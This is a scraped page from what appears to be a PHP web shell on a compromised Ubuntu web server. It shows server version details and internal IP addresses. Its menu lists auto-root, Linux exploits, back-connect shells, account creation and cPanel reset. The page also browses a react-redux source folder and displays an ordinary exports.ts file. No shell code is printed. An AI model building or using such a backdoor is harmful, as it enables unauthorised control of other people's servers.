Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
react-redux /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
components
[ DIR ]
drwxrwxr-x
connect
[ DIR ]
drwxrwxr-x
hooks
[ DIR ]
drwxrwxr-x
utils
[ DIR ]
drwxrwxr-x
alternate-renderers.ts
917
B
-rw-rw-r--
exports.ts
1.57
KB
-rw-rw-r--
index.ts
927
B
-rw-rw-r--
next.ts
968
B
-rw-rw-r--
types.ts
5.77
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : exports.ts
import Provider from './components/Provider' import type { ProviderProps } from './components/Provider' import connect from './components/connect' import type { Connect, ConnectProps, ConnectedProps, } from './components/connect' import type { SelectorFactory, Selector, MapStateToProps, MapStateToPropsFactory, MapStateToPropsParam, MapDispatchToPropsFunction, MapDispatchToProps, MapDispatchToPropsFactory, MapDispatchToPropsParam, MapDispatchToPropsNonObject, MergeProps, } from './connect/selectorFactory' import { ReactReduxContext } from './components/Context' import type { ReactReduxContextValue } from './components/Context' import { useDispatch, createDispatchHook } from './hooks/useDispatch' import { useSelector, createSelectorHook } from './hooks/useSelector' import { useStore, createStoreHook } from './hooks/useStore' import shallowEqual from './utils/shallowEqual' import type { Subscription } from './utils/Subscription' export * from './types' export type { ProviderProps, SelectorFactory, Selector, MapStateToProps, MapStateToPropsFactory, MapStateToPropsParam, Connect, ConnectProps, ConnectedProps, MapDispatchToPropsFunction, MapDispatchToProps, MapDispatchToPropsFactory, MapDispatchToPropsParam, MapDispatchToPropsNonObject, MergeProps, ReactReduxContextValue, Subscription, } export { Provider, ReactReduxContext, connect, useDispatch, createDispatchHook, useSelector, createSelectorHook, useStore, createStoreHook, shallowEqual, }
Close